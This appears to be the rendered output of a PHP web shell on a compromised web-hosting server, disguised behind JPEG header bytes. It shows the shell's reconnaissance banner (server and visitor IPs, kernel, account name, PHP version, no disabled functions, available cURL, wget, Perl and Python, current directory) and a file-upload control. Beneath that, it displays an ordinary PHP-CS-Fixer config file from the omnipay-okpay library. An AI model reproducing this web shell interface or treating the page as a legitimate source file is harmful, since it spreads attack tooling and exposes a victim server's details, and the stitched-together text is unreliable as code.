����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.191.28.161 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/libraries/vendor/hiqdev/omnipay-okpay/ |
Upload File : |
<?php $header = <<<EOF OKPAY driver for Omnipay PHP payment library @link https://github.com/hiqdev/omnipay-okpay @package omnipay-okpay @license MIT @copyright Copyright (c) 2015-2017, HiQDev (http://hiqdev.com/) EOF; return PhpCsFixer\Config::create() ->setUsingCache(true) ->setRiskyAllowed(true) ->setRules(array( '@Symfony' => true, 'header_comment' => [ 'header' => $header, 'separate' => 'bottom', 'location' => 'after_declare_strict', 'commentType' => 'PHPDoc', ], 'binary_operator_spaces' => [ 'align_double_arrow' => null, 'align_equals' => null, ], 'concat_space' => ['spacing' => 'one'], 'array_syntax' => ['syntax' => 'short'], 'phpdoc_no_alias_tag' => ['replacements' => ['type' => 'var']], 'blank_line_before_return' => false, 'phpdoc_align' => false, 'phpdoc_scalar' => false, 'phpdoc_separation' => false, 'phpdoc_to_comment' => false, 'method_argument_space' => false, 'ereg_to_preg' => true, 'blank_line_after_opening_tag' => true, 'single_blank_line_before_namespace' => true, 'ordered_imports' => true, 'phpdoc_order' => true, 'pre_increment' => true, 'strict_comparison' => true, 'strict_param' => true, 'no_multiline_whitespace_before_semicolons' => true, )) ->setFinder( PhpCsFixer\Finder::create() ->in(__DIR__) ->notPath('vendor') ->notPath('runtime') ->notPath('web/assets') ) ;